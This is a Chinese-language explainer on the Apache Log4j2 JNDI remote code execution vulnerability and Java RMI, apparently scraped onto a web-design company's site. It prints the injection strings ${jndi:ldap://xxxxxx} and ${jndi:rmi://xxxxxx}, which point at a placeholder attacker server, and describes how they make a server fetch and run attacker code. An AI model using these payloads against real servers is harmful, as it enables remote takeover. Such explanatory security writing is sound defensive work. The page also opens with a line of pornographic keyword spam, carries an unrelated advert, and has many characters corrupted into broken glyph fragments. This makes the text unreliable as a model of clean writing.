日韩无码专区无码一级三级片|91人人爱网站中日韩无码电影|厨房大战丰满熟妇|AV高清无码在线免费观看|另类AV日韩少妇熟女|中文日本大黄一级黄色片|色情在线视频免费|亚洲成人特黄a片|黄片wwwav色图欧美|欧亚乱色一区二区三区

相信大家最近都被 Apache 的 Log4j2 的漏洞相關的文章刷屏了，不得不說這次的這個漏洞影響范圍之廣，很多互聯(lián)網(wǎng)大廠和開源軟件都被影響到了，作為一個特別通用的日志框架，日常使用的場景非常多，而且很多開源軟件都在使用，所以此次影響到一大批公司，堪稱核彈級漏洞!

創(chuàng)新互聯(lián)專業(yè)為企業(yè)提供渠縣網(wǎng)站建設、渠縣做網(wǎng)站、渠縣網(wǎng)站設計、渠縣網(wǎng)站制作等企業(yè)網(wǎng)站建設、網(wǎng)頁設計與制作、渠縣企業(yè)網(wǎng)站模板建站服務，十余年渠縣做網(wǎng)站經(jīng)驗，不只是建網(wǎng)站，更提供有價值的思路和整體網(wǎng)絡服務。

不過據(jù)說 2021 年 11 月 24 日，阿里云安全團隊向 Apache 官方報告了 Apache Log4j2 遠程代碼執(zhí)行漏洞，可能這是為什么阿里內部群很安靜，沒任何波瀾的原因吧，畢竟有安全部門!但是很多其他公司是工程師就很不幸了，都表示自己在 12 月 10 號這天晚上被拉起來修復漏洞了，還有好多要給客戶打補丁的。

漏洞描述

我們都知道在使用Apache Log4j2 記錄日志的時候，會使用這樣的格式logger.info("params: {}", params);，進行組裝，不要告訴阿粉你是用加號拼裝~。log4j2 底層在進行組裝的時候，如果發(fā)現(xiàn)傳入的 params 當中含有${} 字符串的話會進行替換的時候會執(zhí)行 lookup 的操作，所謂的 lookup 的操作就是允許通過 JNDI檢索變量。

通過 JNDI 注入漏洞，黑客可以惡意構造特殊數(shù)據(jù)請求包，觸發(fā)此漏洞，從而成功利用此漏洞可以在目標服務器上執(zhí)行任意代碼，想想就很恐怖!也就是說當 params 中的參數(shù)包含一些特定的字符的時候，就會觸發(fā)這個漏洞，這種字符數(shù)格式比如：${jndi:ldap://xxxxxx}，${jndi:rmi://xxxxxx} 其中xxxxxx 表示黑客的服務地址。

黑客通過構造這樣的字符串來訪問目標網(wǎng)站，只要程序通過 log4j2 將日志進行記錄，不管是什么級別，就會將 log4j2 的 lookup 功能觸發(fā)，然后就會通過 RMI 訪問黑客的服務地址，黑客通過這個服務輸出一個 class 字節(jié)碼文件，這個字節(jié)碼文件里面可以執(zhí)行任何內容，相當于把這個服務器都交給黑客了，后果可想而知!

攻擊原理

有大佬畫了一張攻擊原理的圖書，阿粉給大家看一下，很詳細了。

相關實現(xiàn)的代碼阿粉放到了后臺，回復關鍵字【log4j】獲取，不過復現(xiàn)的過程可能會比較坎坷，因為由于 JDK 版本的問題，很多小伙伴不一定能復現(xiàn)出來。

RMI

估計很多小伙伴看到這個漏洞的時候估計跟阿粉一樣有一個疑問，那就是 RMI 是啥?運用面向搜索引擎編程的技巧，阿粉找到了下面的內容，看上去還是很好理解的。

Java RMI(Java Remote Method Invocation)，即 Java 遠程方法調用。是 Java 編程語言里，一種用于實現(xiàn)遠程過程調用的應用程序編程接口。有點類似于我們常用的服務注冊發(fā)現(xiàn)機制一樣，使用 JRMP(Java Remote Message Protocol，Java遠程消息交換協(xié)議)實現(xiàn)，使得客戶端運行的程序可以調用遠程服務器上的對象，有點 RPC 的感覺。

劃重點

王堅博士曾說：安全是互聯(lián)網(wǎng)公司的生命，也是每一位網(wǎng)民的最基本需求。

互聯(lián)網(wǎng)軟件的安全與我們每一個程序員相關，我們在日常工作中要隨時有應對各種安全漏洞的準備，寫的代碼也有盡量沒有漏洞。為此阿粉特意找來了一本由阿里知名白帽子道哥編寫的《白帽子講 Web 安全》書籍，里面分析了很多種 Web 安全，如下面所示，讓我們?yōu)榛ヂ?lián)網(wǎng)的安全做一點小小的貢獻。

新聞名稱：Apache 存在 Log4j2 遠程代碼執(zhí)行漏洞，有哪些信息值得關注？
瀏覽路徑：http://m.5511xx.com/article/dphisdo.html